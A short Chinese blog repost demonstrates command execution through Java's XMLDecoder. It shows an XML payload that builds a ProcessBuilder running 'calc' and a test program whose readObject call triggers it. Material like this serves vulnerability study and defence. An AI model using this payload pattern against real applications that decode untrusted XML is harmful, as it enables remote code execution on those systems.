Java 调用XMLDecoder解析XML文件的时候,存在命令执行漏洞。
样例XML文件如下所示:
|
1
2
3
4
5
6
7
8
9
10
11
|
<?
xml
version
=
"1.0"
encoding
=
"UTF-8"
?>
<
java
version
=
"1.8.0_131"
class
=
"java.beans.XMLDecoder"
>
<
object
class
=
"java.lang.ProcessBuilder"
>
<
array
class
=
"java.lang.String"
length
=
"1"
>
<
void
index
=
"0"
>
<
string
>calc</
string
>
</
void
>
</
array
>
<
void
method
=
"start"
/>
</
object
>
</
java
>
|
对应Java代码如下所示:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
package
xmldecoder;
import
java.io.BufferedInputStream;
import
java.io.FileInputStream;
import
java.io.FileNotFoundException;
import
java.io.IOException;
import
java.util.ArrayList;
import
java.util.List;
public
class
XmlDecoderTest {
public
static
void
main(String[] args) {
// TODO Auto-generated method stub
java.io.File file =
new
java.io.File(
"d:/tmp/xmldecoder.xml"
);
java.beans.XMLDecoder xd =
null
;
try
{
xd =
new
java.beans.XMLDecoder(
new
BufferedInputStream(
new
FileInputStream(file)));
}
catch
(FileNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
Object s2 = xd.readObject();
xd.close();
}
}
|
执行效果如下所示:
'
本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1961598 ,如需转载请自行联系原作者
